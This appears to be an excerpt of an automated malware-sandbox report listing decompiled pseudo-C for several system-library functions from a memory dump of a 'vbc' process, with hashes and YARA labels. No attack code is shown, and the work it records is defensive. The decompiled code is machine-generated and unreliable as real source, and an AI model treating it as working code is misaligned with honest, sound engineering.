                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                  • Instruction ID: 8ea7e9c64cbb7d4e6a021e0d94509fa542fb432e052d7d06231f1710ed76ec08
                                                  • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                  • Instruction Fuzzy Hash: 52518F71504716AFC324DF19C840A6BBBF4FF98710F00892EFA958B690E774E904CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01633540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 75%
                                                  			E01633540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x16ad360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E015F0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01633706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E015FFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01633540;
						E015FFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0160DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01640C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E015F97C0();
					}
					return E015FB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01633971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01633884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E015FFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E015F9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01633787(_a4,  &_v352, _t80);
						}
					}
					L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E015F95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                  0x01633552
                                                  0x0163355a
                                                  0x0163355d
                                                  0x01633566
                                                  0x01633567
                                                  0x0163357e
                                                  0x0163358f
                                                  0x016335a1
                                                  0x016335a5
                                                  0x0163366b
                                                  0x0163366b
                                                  0x0163366d
                                                  0x01633672
                                                  0x01633679
                                                  0x01633685
                                                  0x0163368d
                                                  0x0163369d
                                                  0x016336a7
                                                  0x016336b8
                                                  0x016336c6
                                                  0x016336c7
                                                  0x016336dc
                                                  0x016336e1
                                                  0x016336e7
                                                  0x016336e9
                                                  0x016336e9
                                                  0x01633703
                                                  0x01633703
                                                  0x016335b5
                                                  0x016335c0
                                                  0x016335c4
                                                  0x00000000
                                                  0x00000000
                                                  0x016335ca
                                                  0x016335d7
                                                  0x016335e2
                                                  0x016335e6
                                                  0x016335e8
                                                  0x016335f5
                                                  0x016335fa
                                                  0x01633603
                                                  0x01633604
                                                  0x01633609
                                                  0x0163360a
                                                  0x01633612
                                                  0x01633613
                                                  0x0163361e
                                                  0x01633622
                                                  0x01633628
                                                  0x0163362f
                                                  0x0163362f
                                                  0x01633636
                                                  0x01633638
                                                  0x0163363b
                                                  0x01633642
                                                  0x01633642
                                                  0x01633636
                                                  0x01633657
                                                  0x01633657
                                                  0x0163365c
                                                  0x01633662
                                                  0x01633669
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryHash
                                                  • API String ID: 0-2202222882
                                                  • Opcode ID: 59d7b6315ce9604dc74f6bb4ead44904667be67172f2ce5e062bf42942c75c7e
                                                  • Instruction ID: d19c513748fcc64a9424c3ecabbc8d91192ea613281ed845a9558978ebc6cd4f
                                                  • Opcode Fuzzy Hash: 59d7b6315ce9604dc74f6bb4ead44904667be67172f2ce5e062bf42942c75c7e
                                                  • Instruction Fuzzy Hash: 4E4124B290052D9FDB219A50CC84FEEB77DBB95714F0045E9E709AB240DB709E888F98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 016805AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 71%
                                                  			E016805AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E016807DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E015F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0167A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0167A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01681293(_t79, _v40, E016807DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E015D7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0167138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                  0x016805c5
                                                  0x016805ca
                                                  0x016805d3
                                                  0x016806db
                                                  0x016806db
                                                  0x016806dd
                                                  0x016806e3
                                                  0x016806e3
                                                  0x016805dd
                                                  0x016805e7
                                                  0x016805f6
                                                  0x01680600
                                                  0x01680607
                                                  0x01680610
                                                  0x01680615
                                                  0x0168061a
                                                  0x0168061c
                                                  0x0168061e
                                                  0x01680624
                                                  0x01680625
                                                  0x01680627
                                                  0x01680628
                                                  0x01680631
                                                  0x01680640
                                                  0x0168064d
                                                  0x01680654
                                                  0x01680654
                                                  0x01680631
                                                  0x0168066d
                                                  0x01680674
                                                  0x00000000
                                                  0x00000000
                                                  0x01680692
                                                  0x0168069e
                                                  0x016806b0
                                                  0x016806a0
                                                  0x016806a9
                                                  0x016806a9
                                                  0x016806b8
                                                  0x016806d6
                                                  0x016806d6
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `
                                                  • API String ID: 0-2679148245
                                                  • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                  • Instruction ID: 70904d0a61c97c272c8d66edd3044151fbb8e918b31ae25a4ecff4d050ecf3c1
                                                  • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                  • Instruction Fuzzy Hash: 1E3104322007166BE720EE28CC44F9B7BD9FBC4758F184629FA54DB280D770E948CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01633884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E01633884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E015F9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L015D4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E015F9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                  0x01633893
                                                  0x01633896
                                                  0x01633899
                                                  0x0163389f
                                                  0x016338a0
                                                  0x016338a4
                                                  0x016338a9
                                                  0x016338ac
                                                  0x016338ad
                                                  0x016338ae
                                                  0x016338af
                                                  0x016338b1
                                                  0x016338b4
                                                  0x016338bb
                                                  0x016338bc
                                                  0x016338bd
                                                  0x016338c4
                                                  0x016338c8
                                                  0x016338ca
                                                  0x016338ca
                                                  0x016338d5
                                                  0x0163393e
                                                  0x01633940
                                                  0x01633942
                                                  0x01633952
                                                  0x01633954
                                                  0x01633961
                                                  0x01633961
                                                  0x01633967
                                                  0x0163396e
                                                  0x0163396e
                                                  0x01633947
                                                  0x0163394c
                                                  0x00000000
                                                  0x0163394c
                                                  0x016338ea
                                                  0x016338ee
                                                  0x016338f8
                                                  0x016338f9
                                                  0x016338ff
                                                  0x01633900
                                                  0x01633902
                                                  0x01633903
                                                  0x0163390b
                                                  0x0163390f
                                                  0x01633950
                                                  0x00000000
                                                  0x01633950
                                                  0x01633915
                                                  0x0163391d
                                                  0x0163391d
                                                  0x01633922
                                                  0x01633926
                                                  0x00000000
                                                  0x01633928
                                                  0x0163392b
                                                  0x0163392b
                                                  0x01633935
                                                  0x01633937
                                                  0x01633937
                                                  0x00000000
                                                  0x01633935
                                                  0x01633926
                                                  0x016338f0
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryName
                                                  • API String ID: 0-215506332
                                                  • Opcode ID: 0535e1cffd6179042c0438ef34ad2bde7362fe281ed23cf4115f43145846b7ff
                                                  • Instruction ID: 9a40dd59f329ee06804f87a2629a3927b6e7b5ccbfb55cd7fc04bf746db766f0
                                                  • Opcode Fuzzy Hash: 0535e1cffd6179042c0438ef34ad2bde7362fe281ed23cf4115f43145846b7ff
                                                  • Instruction Fuzzy Hash: 7531B172D0151AEFEB15DA58CD45E6BBBB4FBC0B20F024169E915AB390E7309E01CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015ED294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 33%
                                                  			E015ED294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x16ad360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E015D4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E015FB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E015F98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E015F95D0();
					L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                  0x015ed29c
                                                  0x015ed2a6
                                                  0x015ed2b1
                                                  0x015ed2b5
                                                  0x015ed2b6
                                                  0x015ed2bc
                                                  0x015ed2bd
                                                  0x015ed2be
                                                  0x015ed2bf
                                                  0x015ed2c2
                                                  0x015ed2c4
                                                  0x015ed2cc
                                                  0x015ed384
                                                  0x015ed34b
                                                  0x015ed34f
                                                  0x015ed350
                                                  0x015ed351
                                                  0x015ed35c
                                                  0x015ed35c
                                                  0x015ed2d6
                                                  0x015ed2da
                                                  0x015ed2e1
                                                  0x015ed361
                                                  0x015ed369
                                                  0x015ed36d
                                                  0x015ed2e3
                                                  0x015ed2e3
                                                  0x015ed2e3
                                                  0x015ed2e5
                                                  0x015ed2ed
                                                  0x015ed2f5
                                                  0x015ed2fa
                                                  0x015ed302
                                                  0x015ed303
                                                  0x015ed30b
                                                  0x015ed30f
                                                  0x015ed313
                                                  0x015ed318
                                                  0x015ed31c
                                                  0x015ed320
                                                  0x015ed379
                                                  0x015ed37d
                                                  0x00000000
                                                  0x00000000
                                                  0x0162affe
                                                  0x0162b001
                                                  0x0162b011
                                                  0x00000000
                                                  0x015ed322
                                                  0x015ed322
                                                  0x015ed330
                                                  0x015ed337
                                                  0x015ed35d
                                                  0x015ed339
                                                  0x015ed33f
                                                  0x015ed38c
                                                  0x015ed38c
                                                  0x015ed33f
                                                  0x015ed349
                                                  0x00000000
                                                  0x015ed349

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 479bac43de8099faef899e9941298a2aa6d70fea4bbb77d6857eed7066c301c6
                                                  • Instruction ID: 7c12df7055bb0f1c1e338efebb61f68cf591e51061507cb25129ccb1c62ec3c8
                                                  • Opcode Fuzzy Hash: 479bac43de8099faef899e9941298a2aa6d70fea4bbb77d6857eed7066c301c6
                                                  • Instruction Fuzzy Hash: 4831B1B59083069FC325DF68C984A6FBBF8FBC9654F00092EF9958B250D634DD05CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015C1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E015C1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E015FBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E015FA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E015FA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L015D4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                  0x015c1b8f
                                                  0x015c1b9a
                                                  0x015c1b9c
                                                  0x015c1b9e
                                                  0x015c1ba3
                                                  0x01617010
                                                  0x01617010
                                                  0x00000000
                                                  0x015c1ba9
                                                  0x015c1ba9
                                                  0x015c1bae
                                                  0x00000000
                                                  0x015c1bc5
                                                  0x015c1bca
                                                  0x015c1bcf
                                                  0x015c1bd0
                                                  0x015c1bd1
                                                  0x015c1bd2
                                                  0x015c1bd6
                                                  0x015c1bdc
                                                  0x015c1be0
                                                  0x01616ffc
                                                  0x01617000
                                                  0x00000000
                                                  0x01617006
                                                  0x01617009
                                                  0x01617009
                                                  0x015c1be6
                                                  0x015c1bec
                                                  0x015c1c0b
                                                  0x015c1c0b
                                                  0x015c1c0c
                                                  0x015c1c11
                                                  0x015c1c12
                                                  0x015c1c15
                                                  0x015c1c1b
                                                  0x015c1c1f
                                                  0x015c1c31
                                                  0x015c1c33
                                                  0x01617026
                                                  0x01617026
                                                  0x015c1c21
                                                  0x015c1c24
                                                  0x015c1c24
                                                  0x015c1bee
                                                  0x015c1bee
                                                  0x015c1bf2
                                                  0x015c1c3a
                                                  0x015c1bf4
                                                  0x015c1bf4
                                                  0x015c1c05
                                                  0x015c1c05
                                                  0x015c1c09
                                                  0x015c1c3e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015c1c09
                                                  0x015c1bec
                                                  0x015c1be0
                                                  0x015c1bae
                                                  0x015c1c2e

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: WindowsExcludedProcs
                                                  • API String ID: 0-3583428290
                                                  • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                  • Instruction ID: 3378c61cb01e753c37328ac505948c87af55b4674cf331d6aa0fb62c5606dfc3
                                                  • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                  • Instruction Fuzzy Hash: A821F87A600619EFDB22DE99C880F9FBBBDBF81A55F094429FA048F205D630DD01C7A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015DF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015DF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                  0x015df71d
                                                  0x015df722
                                                  0x015df726
                                                  0x01624770
                                                  0x015df765
                                                  0x015df769
                                                  0x015df769
                                                  0x015df732
                                                  0x0162477a
                                                  0x00000000
                                                  0x0162477a
                                                  0x015df738
                                                  0x015df73a
                                                  0x015df73c
                                                  0x015df73f
                                                  0x015df746
                                                  0x015df778
                                                  0x015df7a9
                                                  0x015df7a9
                                                  0x015df754
                                                  0x015df75a
                                                  0x015df75d
                                                  0x015df75f
                                                  0x015df761
                                                  0x015df76f
                                                  0x015df771
                                                  0x015df771
                                                  0x015df76f
                                                  0x015df763
                                                  0x00000000
                                                  0x015df763
                                                  0x015df77d
                                                  0x015df7a3
                                                  0x015df7a5
                                                  0x00000000
                                                  0x015df7a5
                                                  0x015df77f
                                                  0x015df782
                                                  0x015df784
                                                  0x015df786
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015df788
                                                  0x015df748
                                                  0x015df74d
                                                  0x015df78d
                                                  0x015df793
                                                  0x015df7b7
                                                  0x015df7bc
                                                  0x00000000
                                                  0x015df7bc
                                                  0x015df798
                                                  0x00000000
                                                  0x00000000
                                                  0x015df79d
                                                  0x015df7b0
                                                  0x00000000
                                                  0x015df7b0
                                                  0x015df79f
                                                  0x00000000
                                                  0x015df74f
                                                  0x015df74f
                                                  0x00000000
                                                  0x015df74f

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx
                                                  • API String ID: 0-89312691
                                                  • Opcode ID: eef7423605d9a31deed366358b2b6ff9eece82233b1e423e2fe0544d8dfc2cb1
                                                  • Instruction ID: ce6f6d54b4996f16e927403ec3580a9972bc72af2e32a12b9536ab70e3706fe9
                                                  • Opcode Fuzzy Hash: eef7423605d9a31deed366358b2b6ff9eece82233b1e423e2fe0544d8dfc2cb1
                                                  • Instruction Fuzzy Hash: 4511D0343086028BEB354E1C88907BA76D5FB85224F27492BE467CF391EB70C8438781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01668DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 71%
                                                  			E01668DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1690d50);
				E0160D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01645720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0160DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0160DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0160D130(_t34, _t39, _t40);
			}





                                                  0x01668df1
                                                  0x01668df1
                                                  0x01668df1
                                                  0x01668df1
                                                  0x01668df1
                                                  0x01668df1
                                                  0x01668df3
                                                  0x01668df8
                                                  0x01668dfd
                                                  0x01668e00
                                                  0x01668e0e
                                                  0x01668e2a
                                                  0x01668e36
                                                  0x01668e38
                                                  0x01668e3c
                                                  0x01668e46
                                                  0x01668e46
                                                  0x01668e36
                                                  0x01668e50
                                                  0x01668e56
                                                  0x01668e59
                                                  0x01668e5c
                                                  0x01668e60
                                                  0x01668e67
                                                  0x01668e6d
                                                  0x01668e73
                                                  0x01668e74
                                                  0x01668eb1
                                                  0x01668ebd

                                                  Strings
                                                  • Critical error detected %lx, xrefs: 01668E21
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Critical error detected %lx
                                                  • API String ID: 0-802127002
                                                  • Opcode ID: e401f9e685b903baaa40d52a4acf4582430f978a9c69ad8db72eabe7849c2c23
                                                  • Instruction ID: 39a9e77b08d588751daf4c8dc4c7987c87ba960e1afb02fea5bed2ed942cbac8
                                                  • Opcode Fuzzy Hash: e401f9e685b903baaa40d52a4acf4582430f978a9c69ad8db72eabe7849c2c23
